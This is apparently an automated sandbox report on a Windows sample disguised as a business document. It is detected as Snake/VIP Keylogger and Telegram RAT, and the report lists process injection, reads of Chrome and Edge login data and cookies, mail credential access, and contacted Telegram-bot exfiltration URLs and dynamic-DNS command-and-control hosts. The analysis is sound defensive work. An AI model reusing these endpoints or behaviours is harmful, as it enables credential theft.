Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C48189 SetUnhandledExceptionFilter,		0_2_00C48189
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C481AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00C481AC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E13008

Jump to behavior

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C5B106 LogonUserW,

0_2_00C5B106

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C23D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00C23D19

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C6411C SendInput,keybd_event,

0_2_00C6411C

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C674E7 mouse_event,

0_2_00C674E7

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\114117914 - Rebound Electronics.exe"

Jump to behavior

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

0_2_00C5A66C

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C671FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00C671FA

Source: 114117914 - Rebound Electronics.exe	Binary or memory string: Shell_TrayWnd
Source: 114117914 - Rebound Electronics.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C465C4 cpuid

0_2_00C465C4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C7091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

0_2_00C7091D

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C9B340 GetUserNameW,

0_2_00C9B340

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C51E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00C51E8E

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C3DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00C3DDC0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000001.00000002.4130425845.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 114117914 - Rebound Electronics.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7520, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.4130425845.00000000030B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 114117914 - Rebound Electronics.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7520, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: 114117914 - Rebound Electronics.exe	Binary or memory string: WIN_81
Source: 114117914 - Rebound Electronics.exe	Binary or memory string: WIN_XP
Source: 114117914 - Rebound Electronics.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: 114117914 - Rebound Electronics.exe	Binary or memory string: WIN_XPe
Source: 114117914 - Rebound Electronics.exe	Binary or memory string: WIN_VISTA
Source: 114117914 - Rebound Electronics.exe	Binary or memory string: WIN_7
Source: 114117914 - Rebound Electronics.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4130425845.000000000303D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 114117914 - Rebound Electronics.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7520, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000001.00000002.4130425845.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 114117914 - Rebound Electronics.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7520, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.114117914 - Rebound Electronics.exe.3de0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.4130425845.00000000030B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 114117914 - Rebound Electronics.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7520, type: MEMORYSTR

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C78C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00C78C4F
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C7923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00C7923B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	3 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	127 System Information Discovery	Distributed Component Object Model	21 Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	2 Valid Accounts	LSA Secrets	131 Security Software Discovery	SSH	3 Clipboard Data	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Virtualization/Sandbox Evasion	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Access Token Manipulation	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	212 Process Injection	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
114117914 - Rebound Electronics.exe	32%	ReversingLabs	Win32.Trojan.AutoitInject
114117914 - Rebound Electronics.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://panta.home.pl	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
panta.home.pl	188.128.134.93	true	true	unknown
reallyfreegeoip.org	188.114.97.3	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2020/11/2024%20/%2021:02:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://reallyfreegeoip.org/xml/8.46.123.75	false	high
http://checkip.dyndns.org/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	RegSvcs.exe, 00000001.00000002.4130425845.0000000003126000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.000000000303D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	RegSvcs.exe, 00000001.00000002.4130425845.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	114117914 - Rebound Electronics.exe, 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.0000000003018000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false		high
https://www.office.com/lB	RegSvcs.exe, 00000001.00000002.4130425845.0000000003121000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20a	RegSvcs.exe, 00000001.00000002.4130425845.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	RegSvcs.exe, 00000001.00000002.4130425845.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	RegSvcs.exe, 00000001.00000002.4132101583.00000000041B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004204000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004012000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.000000000303D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004087000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004060000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.00000000042DA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	RegSvcs.exe, 00000001.00000002.4132101583.00000000041B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004204000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004012000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.000000000303D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004087000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004060000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.00000000042DA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	RegSvcs.exe, 00000001.00000002.4130425845.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	RegSvcs.exe, 00000001.00000002.4130425845.00000000030F5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	114117914 - Rebound Electronics.exe, 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	114117914 - Rebound Electronics.exe, 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?L	RegSvcs.exe, 00000001.00000002.4130425845.00000000030B4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	114117914 - Rebound Electronics.exe, 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	false		high
http://panta.home.pl	RegSvcs.exe, 00000001.00000002.4130425845.00000000030B4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.75$	RegSvcs.exe, 00000001.00000002.4130425845.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.0000000002FAC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	RegSvcs.exe, 00000001.00000002.4132101583.0000000004018000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004191000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.00000000042B5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.00000000041BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004062000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000003FED000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	114117914 - Rebound Electronics.exe, 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enlB	RegSvcs.exe, 00000001.00000002.4130425845.00000000030F0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	RegSvcs.exe, 00000001.00000002.4130425845.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.0000000002F82000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.0000000003018000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	RegSvcs.exe, 00000001.00000002.4132101583.0000000004018000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004191000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.00000000042B5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.00000000041BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000004062000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4132101583.0000000003FED000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000001.00000002.4130425845.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	114117914 - Rebound Electronics.exe, 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	114117914 - Rebound Electronics.exe, 00000000.00000002.1693880834.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4130425845.0000000002F82000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4129575492.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	false
188.128.134.93	panta.home.pl	Poland	12824	HOMEPL-ASPL	true
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1559211
Start date and time:	2024-11-20 10:11:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	114117914 - Rebound Electronics.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/2@4/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 58 Number of non-executed functions: 287
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RegSvcs.exe, PID 7520 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: 114117914 - Rebound Electronics.exe

Simulations

Behavior and APIs

Time	Type	Description
04:12:05	API Interceptor	10126169x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	BOQ and Full Specification.exe	Get hash	malicious	GuLoader	Browse
	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Quote specification and BOQ.exe	Get hash	malicious	GuLoader	Browse
	e-dekont_html.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	REPLY TO NOTICE GST DRC-1A_pdf.exe	Get hash	malicious	Unknown	Browse
	Xkl0PnD8zFPjfh1.wiz.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	file.exe	Get hash	malicious	Ailurophile Stealer	Browse
	INQUIRY_pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	P.O 423737.exe	Get hash	malicious	MassLogger RAT	Browse
188.114.97.3	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.beylikduzu616161.xyz/2nga/
